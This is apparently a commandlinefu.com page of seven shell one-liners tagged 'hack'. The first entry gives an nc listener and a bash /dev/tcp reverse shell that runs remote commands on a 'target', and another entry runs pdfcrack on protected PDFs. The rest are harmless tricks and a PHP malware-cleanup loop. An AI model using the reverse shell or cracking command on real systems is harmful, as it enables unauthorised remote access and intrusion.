Commands tagged hack (7)
-
This is sneaky. First, start a listening service on your box.
nc -l 8080 -vvv &On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor.exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; doneYou can send it to the background like this:(exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) &Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client. Show Sample Output9exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done -
This is a very hackish way to do it that I'm mainly just posting for fun, and I guess technically can more accurately be said to result in undefined behavior. What the command does is tell the shell to treat libpng like it's a shell plugin (which it's most certainly not) and attempt to install a "png_create_read" command from the library. It looks for the struct with the information about the command; since it's always the command name followed by "_struct", it'll look for a symbol called "png_create_read_struct". And it finds it, since this is the name of one of libpng's functions. But bash has no way to tell it's a function instead of a struct, so it goes ahead and parses the function's code as if it was command metadata. Inevitably, bash will attempt to dereference an invalid pointer or whatever, resulting in a segfault.
3enable -f /usr/lib/libpng.so png_create_read -
Use 'ctrl-@' to set a mark. See the first comment for a better explanation.
2ctrl-x ctrl-x -
This will fetch a metascore from metacritic.com. It requires a url from metacritic without the http://www.metacritic.com/ Example:
metascore games/platforms/wii/supermariogalaxy-metascore tv/shows/marriageref-metascore video/titles/newmoonWould be cool to use this in some sort of a graph. Show Sample Output1metascore(){ curl -s "http://www.metacritic.com/$@" | sed -rn 's|\t*<!-- metascore --><div id="metascore" class=".*">([^<]*)</div>|\1|p'; } -
0paste <(cut -f1 log.txt) <(cut -f2- log.txt | shuf)
-
loop through files in .php extension make a .bak of each of them find the base64_decode function and remove it
0for f in `find . -name "*.php"`; do perl -p -i.bak -e 's/<\?php \/\*\*\/ eval\(base64_decode\(\"[^\"]+"\)\);\?>//' $f; done -
See http://sourceforge.net/projects/pdfcrack/files/pdfcrack/pdfcrack-0.10/ For debian and ubuntu :
sudo apt-get install pdfcrack-1pdfcrack <FILE>
What's this?
commandlinefu.com is the place to record those command-line gems that you return to again and again. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.
Check These Out
Stay in the loop…
- Follow the Tweets.
-
Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.
» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10 - Subscribe to the feeds.
-
Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):
Subscribe to the feed for:
- » all commands
- » commands with 3 up-votes (commandlinefu3)
- » commands with 10 up-votes (commandlinefu10)
- » commands tagged hack